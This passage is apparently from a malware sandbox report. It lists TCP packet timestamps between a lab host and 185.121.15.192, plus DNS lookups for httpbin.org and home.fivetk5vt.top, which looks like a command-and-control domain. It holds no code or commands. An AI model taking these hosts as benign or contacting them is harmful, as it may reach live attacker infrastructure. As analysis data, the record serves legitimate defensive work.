                                                      Dec 20, 2024 17:18:09.286045074 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286247015 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286257029 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286379099 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286396027 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286405087 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286618948 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286629915 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286638021 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286771059 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286782026 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286789894 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.286801100 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287033081 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287096977 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287106991 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287213087 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287223101 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287424088 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287434101 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287441969 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287866116 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287877083 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287884951 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287908077 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287918091 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.287926912 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288234949 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288244963 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288253069 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288261890 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288265944 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288269043 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288273096 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288475990 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288486958 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288496017 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.288505077 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.327454090 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.327627897 CET8049716185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.840745926 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:09.960331917 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:09.960406065 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:09.960705996 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.080159903 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080260992 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080271959 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080328941 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080352068 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.080385923 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.080404997 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080415010 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080423117 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080466032 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.080473900 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080482006 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.080483913 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080538988 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.080565929 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.080612898 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.199820042 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.199959993 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.200011015 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.200021982 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.200082064 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.200176954 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.200189114 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.200226068 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.200258970 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.200263023 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.200344086 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.245101929 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.245368958 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.360960960 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.361133099 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.408987045 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.522655010 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.522895098 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:10.728993893 CET8049717185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:10.729093075 CET4971780192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.956723928 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.956767082 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.956789017 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.956814051 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.956829071 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.956855059 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.956881046 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.956886053 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.956945896 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.956948996 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.956954002 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.957011938 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.957036018 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.958014011 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.959671021 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959707022 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959749937 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.959803104 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959811926 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959870100 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959872961 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.959875107 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959918022 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.959964037 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959976912 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.959980965 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960007906 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.960036039 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960040092 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960045099 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.960048914 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960098028 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.960113049 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.960139990 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960144043 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960185051 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960208893 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.960213900 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.960247993 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.960294962 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.961033106 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.961082935 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.961092949 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.961098909 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.961153984 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.961221933 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.961299896 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.962003946 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.962073088 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.962095976 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.962100029 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.962157965 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.962161064 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.962228060 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.962930918 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.963022947 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.963037968 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.963042974 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.963052034 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.963104963 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.963529110 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.963589907 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.963891983 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.963926077 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.964082003 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964087009 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964096069 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964134932 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.964169979 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.964637041 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964729071 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964782000 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.964819908 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964829922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964900017 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.964916945 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.964946985 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.964951992 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965018988 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.965074062 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965147972 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.965189934 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965194941 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965246916 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:12.965306997 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965311050 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965332031 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965447903 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965557098 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965605974 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965610027 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965709925 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965769053 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.965778112 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966037035 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966041088 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966049910 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966053963 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966065884 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966074944 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966083050 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966284990 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966298103 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966306925 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966311932 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966315985 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966325045 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966330051 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966332912 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966352940 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966362953 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966428041 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966434002 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966444969 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966484070 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966582060 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:12.966588020 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.002877951 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.003060102 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:13.003274918 CET4972380192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:13.075640917 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.075710058 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.075838089 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.075906992 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076016903 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076026917 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076160908 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076188087 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076325893 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076440096 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076503038 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076507092 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076641083 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076726913 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076837063 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076841116 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.076992035 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077066898 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077071905 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077099085 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077169895 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077178001 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077239037 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077297926 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077364922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077447891 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077491999 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077500105 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077619076 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077800989 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077805996 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077863932 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077954054 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.077961922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078003883 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078042984 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078227043 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078236103 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.078330040 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079308033 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079399109 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079499960 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079591990 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079677105 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079680920 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079788923 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079793930 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079932928 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.079967976 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080022097 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080132008 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080142975 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080224991 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080234051 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080238104 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080353975 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080358028 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080365896 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080370903 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080408096 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080450058 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080480099 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080559969 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080569029 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080573082 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080648899 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080652952 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080698013 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080766916 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080775976 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080864906 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080936909 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080940962 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.080993891 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081078053 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081087112 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081090927 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081181049 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081341982 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081705093 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081832886 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081840992 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081845045 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.081929922 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082005978 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082066059 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082170963 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082179070 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082185984 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082511902 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082596064 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082622051 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082712889 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082851887 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082856894 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082865953 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.082917929 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083031893 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083199024 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083410978 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083441019 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083642006 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083692074 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083739042 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083821058 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083825111 CET8049723185.121.15.192192.168.2.10
                                                      Dec 20, 2024 17:18:13.083833933 CET8049723185.121.15.192192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 17:18:03.727962017 CET | 192.168.2.10 | 1.1.1.1 | 0x8d9b | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:03.728292942 CET | 192.168.2.10 | 1.1.1.1 | 0xba1a | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 20, 2024 17:18:07.673774958 CET | 192.168.2.10 | 1.1.1.1 | 0x3147 | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:07.673845053 CET | 192.168.2.10 | 1.1.1.1 | 0x3340 | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:18:09.700790882 CET | 192.168.2.10 | 1.1.1.1 | 0x7c23 | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:09.700854063 CET | 192.168.2.10 | 1.1.1.1 | 0x2e79 | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:18:11.471820116 CET | 192.168.2.10 | 1.1.1.1 | 0x84bf | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:11.472037077 CET | 192.168.2.10 | 1.1.1.1 | 0xdc52 | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:18:13.207850933 CET | 192.168.2.10 | 1.1.1.1 | 0x82f9 | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:13.207914114 CET | 192.168.2.10 | 1.1.1.1 | 0xf07c | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 17:18:03.867022038 CET | 1.1.1.1 | 192.168.2.10 | 0x8d9b | No error (0) | httpbin.org |  | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:03.867022038 CET | 1.1.1.1 | 192.168.2.10 | 0x8d9b | No error (0) | httpbin.org |  | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:07.811785936 CET | 1.1.1.1 | 192.168.2.10 | 0x3147 | No error (0) | home.fivetk5vt.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:09.840171099 CET | 1.1.1.1 | 192.168.2.10 | 0x7c23 | No error (0) | home.fivetk5vt.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:18:11.610188007 CET | 1.1.1.1 | 192.168.2.10 | 0x84bf | No error (0) | home.fivetk5vt.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
